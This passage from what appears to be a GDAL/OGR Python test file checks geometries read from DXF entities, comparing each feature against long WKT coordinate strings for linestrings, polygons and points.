-7.98066629574196e-16,-2.66173878728228 -3.25685517452261 -7.91859396180489e-16,-2.5613203993227 -3.305341629541 -7.8666620288637e-16,-2.46791111376204 -3.35721239031346 -7.82512350407551e-16,-2.38196601125011 -3.41221474770753 -7.79418075895763e-16,-2.30390380768715 
-3.4700807357668 -7.77398454345394e-16,-2.23410481428215 -3.53052843721411 -7.76463325149626e-16,-2.1729090847148 -3.5932633569242 -7.766172441639e-16,-2.12061475842818 -3.65797985667433 -7.77859461510252e-16,-2.07747660812336 -3.724362644183 -7.80183925230636e-16,-2.04370479853239 -3.79208830918224 -7.83579310771463e-16,-2.01946386251686 -3.86082689903993 -7.88029076155679e-16,-2.00487189948035 -3.93024352625587 -7.93511542573623e-16,-2 -4 -8e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):32
# EntityHandle (String) = 21F
# LINESTRING Z (-2 -2 0,-1.96657794502105 -2.03582232791524 0,-1.93571660708646 -2.07387296203834 0,-1.90756413746468 -2.11396923855472 0,-1.88225568337755 -2.15591867344963 0,-1.85991273921989 -2.19951988653655 0,-1.84064256332004 -2.24456356819194 0,-1.8245376630414 -2.29083348415575 0,-1.81167535069652 -2.33810751357387 0,-1.80211737240583 -2.38615871529951 0,-1.79590961168258 -2.43475641733454 0,-1.79308186916688 -2.48366732418105 0,-1.79364771956639 -2.53265663678705 0,-1.79760444649032 -2.58148917971011 0,-1.80493305548955 -2.62993053008786 0,-1.81559836524041 -2.67774814299567 0,-1.8295491764342 -2.72471246778926 0,-1.84671851756181 -2.7705980500731 0,-1.86702396641357 -2.81518461400453 0,-1.89036804575079 -2.85825811973811 0,-1.91663869124976 -2.89961179093367 0,-1.94570978947168 -2.93904710739563 0,-1.97744178327594 -2.97637475807832 0,-2.01168234177068 -3.01141554988232 0,-2.04826709158413 -3.04400126787917 0,-2.08702040594658 -3.07397548283483 0,-2.12775624779472 -3.10119430215541 0,-2.1702790628511 -3.12552706065018 0,-2.2143847183914 -3.14685694779575 0,-2.25986148319297 -3.16508156849045 0,-2.30649104396024 -3.18011343460661 0,-2.35404955334774 -3.1918803849814 0,-2.40230870454951 -3.20032593182975 0,-2.45103682729644 -3.2054095319166 0,-2.5 -3.20710678118655 0,-2.54896317270356 -3.2054095319166 0,-2.59769129545049 -3.20032593182975 0,-2.64595044665226 -3.1918803849814 0,-2.69350895603976 -3.18011343460661 0,-2.74013851680703 -3.16508156849045 0,-2.7856152816086 -3.14685694779575 0,-2.8297209371489 -3.12552706065018 0,-2.87224375220528 -3.10119430215541 0,-2.91297959405342 -3.07397548283483 0,-2.95173290841587 -3.04400126787917 0,-2.98831765822932 -3.01141554988232 0,-3.02255821672406 -2.97637475807832 0,-3.05429021052832 -2.93904710739563 0,-3.08336130875024 -2.89961179093367 0,-3.10963195424921 -2.85825811973811 0,-3.13297603358643 -2.81518461400453 0,-3.15328148243819 -2.7705980500731 0,-3.1704508235658 -2.72471246778926 0,-3.18440163475959 
-2.67774814299567 0,-3.19506694451045 -2.62993053008786 0,-3.20239555350968 -2.58148917971011 0,-3.20635228043361 -2.53265663678705 0,-3.20691813083312 -2.48366732418105 0,-3.20409038831742 -2.43475641733454 0,-3.19788262759417 -2.38615871529951 0,-3.18832464930348 -2.33810751357387 0,-3.1754623369586 -2.29083348415575 0,-3.15935743667996 -2.24456356819194 0,-3.14008726078011 -2.19951988653655 0,-3.11774431662245 -2.15591867344963 0,-3.09243586253532 -2.11396923855472 0,-3.06428339291354 -2.07387296203834 0,-3.03342205497895 -2.03582232791524 0,-3 -2 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2 -2 0,-1.96657794502105 -2.03582232791524 0,-1.93571660708646 -2.07387296203834 0,-1.90756413746468 -2.11396923855472 0,-1.88225568337755 -2.15591867344963 0,-1.85991273921989 -2.19951988653655 0,-1.84064256332004 -2.24456356819194 0,-1.8245376630414 -2.29083348415575 0,-1.81167535069652 -2.33810751357387 0,-1.80211737240583 -2.38615871529951 0,-1.79590961168258 -2.43475641733454 0,-1.79308186916688 -2.48366732418105 0,-1.79364771956639 -2.53265663678705 0,-1.79760444649032 -2.58148917971011 0,-1.80493305548955 -2.62993053008786 0,-1.81559836524041 -2.67774814299567 0,-1.8295491764342 -2.72471246778926 0,-1.84671851756181 -2.7705980500731 0,-1.86702396641357 -2.81518461400453 0,-1.89036804575079 -2.85825811973811 0,-1.91663869124976 -2.89961179093367 0,-1.94570978947168 -2.93904710739563 0,-1.97744178327594 -2.97637475807832 0,-2.01168234177068 -3.01141554988232 0,-2.04826709158413 -3.04400126787917 0,-2.08702040594658 -3.07397548283483 0,-2.12775624779472 -3.10119430215541 0,-2.1702790628511 -3.12552706065018 0,-2.2143847183914 -3.14685694779575 0,-2.25986148319297 -3.16508156849045 0,-2.30649104396024 -3.18011343460661 0,-2.35404955334774 -3.1918803849814 0,-2.40230870454951 -3.20032593182975 0,-2.45103682729644 -3.2054095319166 0,-2.5 -3.20710678118655 0,-2.54896317270356 -3.2054095319166 0,-2.59769129545049 -3.20032593182975 0,-2.64595044665226 -3.1918803849814 0,-2.69350895603976 -3.18011343460661 0,-2.74013851680703 -3.16508156849045 0,-2.7856152816086 -3.14685694779575 0,-2.8297209371489 -3.12552706065018 0,-2.87224375220528 -3.10119430215541 0,-2.91297959405342 -3.07397548283483 0,-2.95173290841587 -3.04400126787917 0,-2.98831765822932 -3.01141554988232 0,-3.02255821672406 -2.97637475807832 0,-3.05429021052832 -2.93904710739563 0,-3.08336130875024 -2.89961179093367 0,-3.10963195424921 -2.85825811973811 0,-3.13297603358643 -2.81518461400453 0,-3.15328148243819 -2.7705980500731 0,-3.1704508235658 
-2.72471246778926 0,-3.18440163475959 -2.67774814299567 0,-3.19506694451045 -2.62993053008786 0,-3.20239555350968 -2.58148917971011 0,-3.20635228043361 -2.53265663678705 0,-3.20691813083312 -2.48366732418105 0,-3.20409038831742 -2.43475641733454 0,-3.19788262759417 -2.38615871529951 0,-3.18832464930348 -2.33810751357387 0,-3.1754623369586 -2.29083348415575 0,-3.15935743667996 -2.24456356819194 0,-3.14008726078011 -2.19951988653655 0,-3.11774431662245 -2.15591867344963 0,-3.09243586253532 -2.11396923855472 0,-3.06428339291354 -2.07387296203834 0,-3.03342205497895 -2.03582232791524 0,-3 -2 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):33
# EntityHandle (String) = 220
# POLYGON Z ((-1 -2 -4e-16,-1 -3 -5e-16,-2 -3 -6e-16,-2 -2 -5e-16,-1 -2 -4e-16))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((-1 -2 -4e-16,-1 -3 -5e-16,-2 -3 -6e-16,-2 -2 -5e-16,-1 -2 -4e-16))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):34
# EntityHandle (String) = 221
# POLYGON ((-3 -4,-4 -4,-4 -3,-3 -3,-3 -4))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-3 -4,-4 -4,-4 -3,-3 -3,-3 -4))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):35
# EntityHandle (String) = 223
# POLYGON ((-8 -8,-9 -8,-9 -9,-8 -9,-8 -8))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-8 -8,-9 -8,-9 -9,-8 -9,-8 -8))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):36
# EntityHandle (String) = 224
# LINESTRING (-2 -2,-2.15384615384615 -2.15384615384615,-2.30769230769231 -2.30769230769231,-2.46153846153846 -2.46153846153846,-2.61538461538461 -2.61538461538461,-2.76923076923077 -2.76923076923077,-2.92307692307692 -2.92307692307692,-3.07692307692308 -3.07692307692308,-3.23076923076923 -3.23076923076923,-3.38461538461538 -3.38461538461538,-3.53846153846154 -3.53846153846154,-3.69230769230769 -3.69230769230769,-3.84615384615385 -3.84615384615385,-4 -4,-4.15384615384615 -4.15384615384615,-4.30769230769231 -4.30769230769231,-4.46153846153846 -4.46153846153846,-4.61538461538462 -4.61538461538462,-4.76923076923077 -4.76923076923077,-4.92307692307692 -4.92307692307692,-5.07692307692308 -5.07692307692308,-5.23076923076923 -5.23076923076923,-5.38461538461538 -5.38461538461538,-5.53846153846154 -5.53846153846154,-5.69230769230769 -5.69230769230769,-5.84615384615385 -5.84615384615385,-6.0 -6.0,-6.15384615384615 -6.15384615384615,-6.30769230769231 -6.30769230769231,-6.46153846153846 -6.46153846153846,-6.61538461538462 -6.61538461538462,-6.76923076923077 -6.76923076923077,-6.92307692307692 -6.92307692307692,-7.07692307692308 -7.07692307692308,-7.23076923076923 -7.23076923076923,-7.38461538461539 -7.38461538461539,-7.53846153846154 -7.53846153846154,-7.69230769230769 -7.69230769230769,-7.84615384615385 -7.84615384615385,-8 -8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-2 -2,-2.15384615384615 -2.15384615384615,-2.30769230769231 -2.30769230769231,-2.46153846153846 -2.46153846153846,-2.61538461538461 -2.61538461538461,-2.76923076923077 -2.76923076923077,-2.92307692307692 -2.92307692307692,-3.07692307692308 -3.07692307692308,-3.23076923076923 -3.23076923076923,-3.38461538461538 -3.38461538461538,-3.53846153846154 -3.53846153846154,-3.69230769230769 -3.69230769230769,-3.84615384615385 -3.84615384615385,-4 -4,-4.15384615384615 -4.15384615384615,-4.30769230769231 -4.30769230769231,-4.46153846153846 -4.46153846153846,-4.61538461538462 -4.61538461538462,-4.76923076923077 -4.76923076923077,-4.92307692307692 -4.92307692307692,-5.07692307692308 -5.07692307692308,-5.23076923076923 -5.23076923076923,-5.38461538461538 -5.38461538461538,-5.53846153846154 -5.53846153846154,-5.69230769230769 -5.69230769230769,-5.84615384615385 -5.84615384615385,-6.0 -6.0,-6.15384615384615 -6.15384615384615,-6.30769230769231 -6.30769230769231,-6.46153846153846 -6.46153846153846,-6.61538461538462 -6.61538461538462,-6.76923076923077 -6.76923076923077,-6.92307692307692 -6.92307692307692,-7.07692307692308 -7.07692307692308,-7.23076923076923 -7.23076923076923,-7.38461538461539 -7.38461538461539,-7.53846153846154 -7.53846153846154,-7.69230769230769 -7.69230769230769,-7.84615384615385 -7.84615384615385,-8 -8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):37
# EntityHandle (String) = 225
# LINESTRING (-8 -1,-7.62837370825536 -0.987348067229724,-7.25775889681215 -0.975707614760869,-6.88916704597178 -0.966090122894857,-6.52360963603567 -0.959507071933107,-6.16209814730525 -0.956969942177043,-5.80564406008193 -0.959490213928084,-5.45525885466714 -0.968079367487651,-5.11195401136229 -0.983748883157167,-4.77674101046882 -1.00751024123805,-4.45063133228814 -1.04037492203173,-4.13463645712167 -1.08335440583961,-3.82976786527082 -1.13746017296313,-3.53703703703704 -1.2037037037037,-3.25745545272173 -1.28309647836275,-2.99203459262631 -1.37664997724169,-2.74178593705221 -1.48537568064195,-2.50772096630085 -1.61028506886495,-2.29085116067365 -1.75238962221211,-2.09218800047203 -1.91270082098484,-1.91270082098485 -2.09218800047202,-1.75238962221211 -2.29085116067364,-1.61028506886495 -2.50772096630085,-1.48537568064195 -2.74178593705221,-1.37664997724169 -2.99203459262631,-1.28309647836275 -3.25745545272172,-1.2037037037037 -3.53703703703703,-1.13746017296313 -3.82976786527082,-1.08335440583961 -4.13463645712166,-1.04037492203173 -4.45063133228814,-1.00751024123805 -4.77674101046882,-0.983748883157167 -5.11195401136229,-0.968079367487652 -5.45525885466714,-0.959490213928084 -5.80564406008193,-0.956969942177043 -6.16209814730525,-0.959507071933108 -6.52360963603567,-0.966090122894857 -6.88916704597178,-0.975707614760869 -7.25775889681216,-0.987348067229724 -7.62837370825537,-1 -8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-8 -1,-7.62837370825536 -0.987348067229724,-7.25775889681215 -0.975707614760869,-6.88916704597178 -0.966090122894857,-6.52360963603567 -0.959507071933107,-6.16209814730525 -0.956969942177043,-5.80564406008193 -0.959490213928084,-5.45525885466714 -0.968079367487651,-5.11195401136229 -0.983748883157167,-4.77674101046882 -1.00751024123805,-4.45063133228814 -1.04037492203173,-4.13463645712167 -1.08335440583961,-3.82976786527082 -1.13746017296313,-3.53703703703704 -1.2037037037037,-3.25745545272173 -1.28309647836275,-2.99203459262631 -1.37664997724169,-2.74178593705221 -1.48537568064195,-2.50772096630085 -1.61028506886495,-2.29085116067365 -1.75238962221211,-2.09218800047203 -1.91270082098484,-1.91270082098485 -2.09218800047202,-1.75238962221211 -2.29085116067364,-1.61028506886495 -2.50772096630085,-1.48537568064195 -2.74178593705221,-1.37664997724169 -2.99203459262631,-1.28309647836275 -3.25745545272172,-1.2037037037037 -3.53703703703703,-1.13746017296313 -3.82976786527082,-1.08335440583961 -4.13463645712166,-1.04037492203173 -4.45063133228814,-1.00751024123805 -4.77674101046882,-0.983748883157167 -5.11195401136229,-0.968079367487652 -5.45525885466714,-0.959490213928084 -5.80564406008193,-0.956969942177043 -6.16209814730525,-0.959507071933108 -6.52360963603567,-0.966090122894857 -6.88916704597178,-0.975707614760869 -7.25775889681216,-0.987348067229724 -7.62837370825537,-1 -8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):38
# EntityHandle (String) = 226
# POINT Z (-7 -7 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-7 -7 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):39
# EntityHandle (String) = 227
# POINT Z (4 -4 -5e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (4 -4 -5e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):40
# EntityHandle (String) = 228
# LINESTRING Z (0 0 0,1 -1 -1e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,1 -1 -1e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):41
# EntityHandle (String) = 229
# LINESTRING (1 -1,2 -1,1 -2,1 -1)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (1 -1,2 -1,1 -2,1 -1)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):42
# EntityHandle (String) = 22A
# LINESTRING Z (1 -1 -1e-16,1 -2 -2e-16,2 -2 -2e-16,1 -1 -1e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1 -1 -1e-16,1 -2 -2e-16,2 -2 -2e-16,1 -1 -1e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):43
# EntityHandle (String) = 22F
# LINESTRING Z (2 -4 -4e-16,2.00487189948035 -4.13951294748825 -4.13951294748825e-16,2.01946386251686 -4.27834620192013 -4.27834620192013e-16,2.04370479853239 -4.41582338163552 -4.41582338163552e-16,2.07747660812336 -4.551274711634 -4.551274711634e-16,2.12061475842818 -4.68404028665134 -4.68404028665134e-16,2.1729090847148 -4.8134732861516 -4.8134732861516e-16,2.23410481428215 -4.93894312557178 -4.93894312557178e-16,2.30390380768715 -5.05983852846641 -5.05983852846641e-16,2.38196601125011 -5.17557050458495 -5.17557050458495e-16,2.46791111376204 -5.28557521937308 -5.28557521937308e-16,2.5613203993227 -5.38931674091799 -5.38931674091799e-16,2.66173878728228 -5.48628965095479 -5.48628965095479e-16,2.76867704934868 -5.57602150721344 -5.57602150721344e-16,2.88161419305851 -5.65807514511008 -5.65807514511008e-16,3.0 -5.73205080756888 -5.73205080756888e-16,3.12325770642185 -5.79758809259833 -5.79758809259833e-16,3.25078681316818 -5.85436770913357 -5.85436770913357e-16,3.38196601125011 -5.90211303259031 -5.90211303259031e-16,3.51615620880066 -5.94059145255199 -5.94059145255199e-16,3.65270364466614 -5.96961550602442 -5.96961550602442e-16,3.79094307346469 -5.98904379073655 -5.98904379073655e-16,3.930201006595 -5.99878165403819 -5.99878165403819e-16,4.069798993405 -5.99878165403819 -5.99878165403819e-16,4.20905692653531 -5.98904379073655 -5.98904379073655e-16,4.34729635533386 -5.96961550602442 -5.96961550602442e-16,4.48384379119934 -5.94059145255199 -5.94059145255199e-16,4.61803398874989 -5.90211303259031 -5.90211303259031e-16,4.74921318683182 -5.85436770913357 -5.85436770913357e-16,4.87674229357815 -5.79758809259833 -5.79758809259833e-16,5.0 -5.73205080756888 -5.73205080756888e-16,5.11838580694149 -5.65807514511008 -5.65807514511008e-16,5.23132295065132 -5.57602150721344 -5.57602150721344e-16,5.33826121271772 -5.48628965095479 -5.48628965095479e-16,5.4386796006773 -5.38931674091799 -5.38931674091799e-16,5.53208888623796 -5.28557521937308 
-5.28557521937308e-16,5.61803398874989 -5.17557050458495 -5.17557050458495e-16,5.69609619231285 -5.05983852846641 -5.05983852846641e-16,5.76589518571785 -4.93894312557178 -4.93894312557178e-16,5.8270909152852 -4.8134732861516 -4.8134732861516e-16,5.87938524157182 -4.68404028665134 -4.68404028665134e-16,5.92252339187664 -4.551274711634 -4.551274711634e-16,5.95629520146761 -4.41582338163552 -4.41582338163552e-16,5.98053613748314 -4.27834620192013 -4.27834620192013e-16,5.99512810051965 -4.13951294748825 -4.13951294748825e-16,6 -4 -4e-16,5.99512810051965 -3.86048705251175 -3.86048705251175e-16,5.98053613748314 -3.72165379807987 -3.72165379807987e-16,5.95629520146761 -3.58417661836448 -3.58417661836448e-16,5.92252339187664 -3.448725288366 -3.448725288366e-16,
#5.87938524157182 -3.31595971334866 -3.31595971334866e-16,5.8270909152852 -3.1865267138484 -3.1865267138484e-16,5.76589518571785 -3.06105687442822 -3.06105687442822e-16,5.69609619231285 -2.94016147153359 -2.94016147153359e-16,5.61803398874989 -2.82442949541505 -2.82442949541505e-16,5.53208888623796 -2.71442478062692 -2.71442478062692e-16,5.4386796006773 -2.61068325908201 -2.61068325908201e-16,5.33826121271772 -2.51371034904521 -2.51371034904521e-16,5.23132295065132 -2.42397849278656 -2.42397849278656e-16,5.11838580694149 -2.34192485488992 -2.34192485488992e-16,5.0 -2.26794919243112 -2.26794919243112e-16,4.87674229357816 -2.20241190740167 -2.20241190740167e-16,4.74921318683182 -2.14563229086643 -2.14563229086643e-16,4.61803398874989 -2.09788696740969 -2.09788696740969e-16,4.48384379119934 -2.05940854744801 -2.05940854744801e-16,4.34729635533386 -2.03038449397558 -2.03038449397558e-16,4.20905692653531 -2.01095620926345 -2.01095620926345e-16,4.069798993405 -2.00121834596181 -2.00121834596181e-16,3.930201006595 -2.00121834596181 -2.00121834596181e-16,3.79094307346469 -2.01095620926345 -2.01095620926345e-16,3.65270364466614 -2.03038449397558 -2.03038449397558e-16,3.51615620880067 -2.05940854744801 -2.05940854744801e-16,3.38196601125011 -2.09788696740969 -2.09788696740969e-16,3.25078681316818 -2.14563229086643 -2.14563229086643e-16,3.12325770642185 -2.20241190740167 -2.20241190740167e-16,3.0 -2.26794919243112 -2.26794919243112e-16,2.88161419305851 -2.34192485488992 -2.34192485488992e-16,2.76867704934868 -2.42397849278656 -2.42397849278656e-16,2.66173878728228 -2.51371034904521 -2.51371034904521e-16,2.5613203993227 -2.610683259082 -2.610683259082e-16,2.46791111376204 -2.71442478062692 -2.71442478062692e-16,2.38196601125011 -2.82442949541505 -2.82442949541505e-16,2.30390380768715 -2.94016147153359 -2.94016147153359e-16,2.23410481428215 -3.06105687442822 -3.06105687442822e-16,2.1729090847148 -3.1865267138484 -3.1865267138484e-16,2.12061475842818 -3.31595971334866 
-3.31595971334866e-16,2.07747660812336 -3.448725288366 -3.448725288366e-16,2.04370479853239 -3.58417661836448 -3.58417661836448e-16,2.01946386251686 -3.72165379807987 -3.72165379807987e-16,2.00487189948035 -3.86048705251175 -3.86048705251175e-16,2.0 -4.0 -4e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 -4 -4e-16,2.00487189948035 -4.13951294748825 -4.13951294748825e-16,2.01946386251686 -4.27834620192013 -4.27834620192013e-16,2.04370479853239 -4.41582338163552 -4.41582338163552e-16,2.07747660812336 -4.551274711634 -4.551274711634e-16,2.12061475842818 -4.68404028665134 -4.68404028665134e-16,2.1729090847148 -4.8134732861516 -4.8134732861516e-16,2.23410481428215 -4.93894312557178 -4.93894312557178e-16,2.30390380768715 -5.05983852846641 -5.05983852846641e-16,2.38196601125011 -5.17557050458495 -5.17557050458495e-16,2.46791111376204 -5.28557521937308 -5.28557521937308e-16,2.5613203993227 -5.38931674091799 -5.38931674091799e-16,2.66173878728228 -5.48628965095479 -5.48628965095479e-16,2.76867704934868 -5.57602150721344 -5.57602150721344e-16,2.88161419305851 -5.65807514511008 -5.65807514511008e-16,3.0 -5.73205080756888 -5.73205080756888e-16,3.12325770642185 -5.79758809259833 -5.79758809259833e-16,3.25078681316818 -5.85436770913357 -5.85436770913357e-16,3.38196601125011 -5.90211303259031 -5.90211303259031e-16,3.51615620880066 -5.94059145255199 -5.94059145255199e-16,3.65270364466614 -5.96961550602442 -5.96961550602442e-16,3.79094307346469 -5.98904379073655 -5.98904379073655e-16,3.930201006595 -5.99878165403819 -5.99878165403819e-16,4.069798993405 -5.99878165403819 -5.99878165403819e-16,4.20905692653531 -5.98904379073655 -5.98904379073655e-16,4.34729635533386 -5.96961550602442 -5.96961550602442e-16,4.48384379119934 -5.94059145255199 -5.94059145255199e-16,4.61803398874989 -5.90211303259031 -5.90211303259031e-16,4.74921318683182 -5.85436770913357 -5.85436770913357e-16,4.87674229357815 -5.79758809259833 -5.79758809259833e-16,5.0 -5.73205080756888 -5.73205080756888e-16,5.11838580694149 -5.65807514511008 -5.65807514511008e-16,5.23132295065132 -5.57602150721344 -5.57602150721344e-16,5.33826121271772 -5.48628965095479 -5.48628965095479e-16,5.4386796006773 -5.38931674091799 -5.38931674091799e-16,5.53208888623796 
-5.28557521937308 -5.28557521937308e-16,5.61803398874989 -5.17557050458495 -5.17557050458495e-16,5.69609619231285 -5.05983852846641 -5.05983852846641e-16,5.76589518571785 -4.93894312557178 -4.93894312557178e-16,5.8270909152852 -4.8134732861516 -4.8134732861516e-16,5.87938524157182 -4.68404028665134 -4.68404028665134e-16,5.92252339187664 -4.551274711634 -4.551274711634e-16,5.95629520146761 -4.41582338163552 -4.41582338163552e-16,5.98053613748314 -4.27834620192013 -4.27834620192013e-16,5.99512810051965 -4.13951294748825 -4.13951294748825e-16,6 -4 -4e-16,5.99512810051965 -3.86048705251175 -3.86048705251175e-16,5.98053613748314 -3.72165379807987 -3.72165379807987e-16,5.95629520146761 -3.58417661836448 -3.58417661836448e-16,5.92252339187664 -3.448725288366 -3.448725288366e-16,5.87938524157182 -3.31595971334866 -3.31595971334866e-16,5.8270909152852 -3.1865267138484 -3.1865267138484e-16,5.76589518571785 -3.06105687442822 -3.06105687442822e-16,5.69609619231285 -2.94016147153359 -2.94016147153359e-16,5.61803398874989 -2.82442949541505 -2.82442949541505e-16,5.53208888623796 -2.71442478062692 -2.71442478062692e-16,5.4386796006773 -2.61068325908201 -2.61068325908201e-16,5.33826121271772 -2.51371034904521 -2.51371034904521e-16,' + \
'5.23132295065132 -2.42397849278656 -2.42397849278656e-16,5.11838580694149 -2.34192485488992 -2.34192485488992e-16,5.0 -2.26794919243112 -2.26794919243112e-16,4.87674229357816 -2.20241190740167 -2.20241190740167e-16,4.74921318683182 -2.14563229086643 -2.14563229086643e-16,4.61803398874989 -2.09788696740969 -2.09788696740969e-16,4.48384379119934 -2.05940854744801 -2.05940854744801e-16,4.34729635533386 -2.03038449397558 -2.03038449397558e-16,4.20905692653531 -2.01095620926345 -2.01095620926345e-16,4.069798993405 -2.00121834596181 -2.00121834596181e-16,3.930201006595 -2.00121834596181 -2.00121834596181e-16,3.79094307346469 -2.01095620926345 -2.01095620926345e-16,3.65270364466614 -2.03038449397558 -2.03038449397558e-16,3.51615620880067 -2.05940854744801 -2.05940854744801e-16,3.38196601125011 -2.09788696740969 -2.09788696740969e-16,3.25078681316818 -2.14563229086643 -2.14563229086643e-16,3.12325770642185 -2.20241190740167 -2.20241190740167e-16,3.0 -2.26794919243112 -2.26794919243112e-16,2.88161419305851 -2.34192485488992 -2.34192485488992e-16,2.76867704934868 -2.42397849278656 -2.42397849278656e-16,2.66173878728228 -2.51371034904521 -2.51371034904521e-16,2.5613203993227 -2.610683259082 -2.610683259082e-16,2.46791111376204 -2.71442478062692 -2.71442478062692e-16,2.38196601125011 -2.82442949541505 -2.82442949541505e-16,2.30390380768715 -2.94016147153359 -2.94016147153359e-16,2.23410481428215 -3.06105687442822 -3.06105687442822e-16,2.1729090847148 -3.1865267138484 -3.1865267138484e-16,2.12061475842818 -3.31595971334866 -3.31595971334866e-16,2.07747660812336 -3.448725288366 -3.448725288366e-16,2.04370479853239 -3.58417661836448 -3.58417661836448e-16,2.01946386251686 -3.72165379807987 -3.72165379807987e-16,2.00487189948035 -3.86048705251175 -3.86048705251175e-16,2.0 -4.0 -4e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):44
# EntityHandle (String) = 230
# LINESTRING Z (2 -4 -5e-16,2.00487189948035 -4.06975647374412 -5.06975647374413e-16,2.01946386251686 -4.13917310096007 -5.13917310096007e-16,2.04370479853239 -4.20791169081776 -5.20791169081776e-16,2.07747660812336 -4.275637355817 -5.275637355817e-16,2.12061475842818 -4.34202014332567 -5.34202014332567e-16,2.1729090847148 -4.4067366430758 -5.4067366430758e-16,2.23410481428215 -4.46947156278589 -5.46947156278589e-16,2.30390380768715 -4.52991926423321 -5.52991926423321e-16,2.38196601125011 -4.58778525229247 -5.58778525229247e-16,2.46791111376204 -4.64278760968654 -5.64278760968654e-16,2.5613203993227 -4.694658370459 -5.694658370459e-16,2.66173878728228 -4.74314482547739 -5.7431448254774e-16,2.76867704934868 -4.78801075360672 -5.78801075360672e-16,2.88161419305851 -4.82903757255504 -5.82903757255504e-16,3.0 -4.86602540378444 -5.86602540378444e-16,3.12325770642185 -4.89879404629917 -5.89879404629917e-16,3.25078681316818 -4.92718385456679 -5.92718385456679e-16,3.38196601125011 -4.95105651629515 -5.95105651629515e-16,3.51615620880067 -4.970295726276 -5.970295726276e-16,3.65270364466614 -4.98480775301221 -5.98480775301221e-16,3.79094307346469 -4.99452189536827 -5.99452189536827e-16,3.930201006595 -4.9993908270191 -5.9993908270191e-16,4.069798993405 -4.9993908270191 -5.9993908270191e-16,4.20905692653531 -4.99452189536827 -5.99452189536827e-16,4.34729635533386 -4.98480775301221 -5.98480775301221e-16,4.48384379119934 -4.970295726276 -5.970295726276e-16,4.61803398874989 -4.95105651629515 -5.95105651629515e-16,4.74921318683182 -4.92718385456679 -5.92718385456679e-16,4.87674229357816 -4.89879404629917 -5.89879404629917e-16,5.0 -4.86602540378444 -5.86602540378444e-16,5.11838580694149 -4.82903757255504 -5.82903757255504e-16,5.23132295065132 -4.78801075360672 -5.78801075360672e-16,5.33826121271772 -4.74314482547739 -5.74314482547739e-16,5.4386796006773 -4.694658370459 -5.694658370459e-16,5.53208888623796 -4.64278760968654 -5.64278760968654e-16,5.61803398874989 -4.58778525229247 
-5.58778525229247e-16,5.69609619231285 -4.5299192642332 -5.52991926423321e-16,5.76589518571785 -4.46947156278589 -5.46947156278589e-16,5.8270909152852 -4.4067366430758 -5.4067366430758e-16,5.87938524157182 -4.34202014332567 -5.34202014332567e-16,5.92252339187664 -4.275637355817 -5.275637355817e-16,5.95629520146761 -4.20791169081776 -5.20791169081776e-16,5.98053613748314 -4.13917310096007 -5.13917310096007e-16,5.99512810051965 -4.06975647374412 -5.06975647374413e-16,6 -4 -5e-16,5.99512810051965 -3.93024352625587 -4.93024352625588e-16,5.98053613748314 -3.86082689903993 -4.86082689903993e-16,5.95629520146761 -3.79208830918224 -4.79208830918224e-16,5.92252339187664 -3.724362644183 -4.724362644183e-16,5.87938524157182 -3.65797985667433 -4.65797985667433e-16,5.8270909152852 -3.5932633569242 -4.5932633569242e-16,5.76589518571785 -3.53052843721411 -4.53052843721411e-16,
#5.69609619231285 -3.4700807357668 -4.4700807357668e-16,5.61803398874989 -3.41221474770753 -4.41221474770753e-16,5.53208888623796 -3.35721239031346 -4.35721239031346e-16,5.4386796006773 -3.305341629541 -4.305341629541e-16,5.33826121271772 -3.25685517452261 -4.25685517452261e-16,5.23132295065132 -3.21198924639328 -4.21198924639328e-16,5.11838580694149 -3.17096242744496 -4.17096242744496e-16,5.0 -3.13397459621556 -4.13397459621556e-16,4.87674229357815 -3.10120595370083 -4.10120595370083e-16,4.74921318683182 -3.07281614543321 -4.07281614543321e-16,4.61803398874989 -3.04894348370485 -4.04894348370485e-16,4.48384379119934 -3.029704273724 -4.029704273724e-16,4.34729635533386 -3.01519224698779 -4.01519224698779e-16,4.20905692653531 -3.00547810463173 -4.00547810463173e-16,4.069798993405 -3.0006091729809 -4.0006091729809e-16,3.930201006595 -3.0006091729809 -4.0006091729809e-16,3.79094307346469 -3.00547810463173 -4.00547810463173e-16,3.65270364466614 -3.01519224698779 -4.01519224698779e-16,3.51615620880066 -3.029704273724 -4.029704273724e-16,3.38196601125011 -3.04894348370485 -4.04894348370485e-16,3.25078681316818 -3.07281614543321 -4.07281614543321e-16,3.12325770642185 -3.10120595370083 -4.10120595370083e-16,3.0 -3.13397459621556 -4.13397459621556e-16,2.88161419305851 -3.17096242744496 -4.17096242744496e-16,2.76867704934868 -3.21198924639328 -4.21198924639328e-16,2.66173878728228 -3.25685517452261 -4.25685517452261e-16,2.5613203993227 -3.305341629541 -4.305341629541e-16,2.46791111376204 -3.35721239031346 -4.35721239031346e-16,2.38196601125011 -3.41221474770753 -4.41221474770753e-16,2.30390380768715 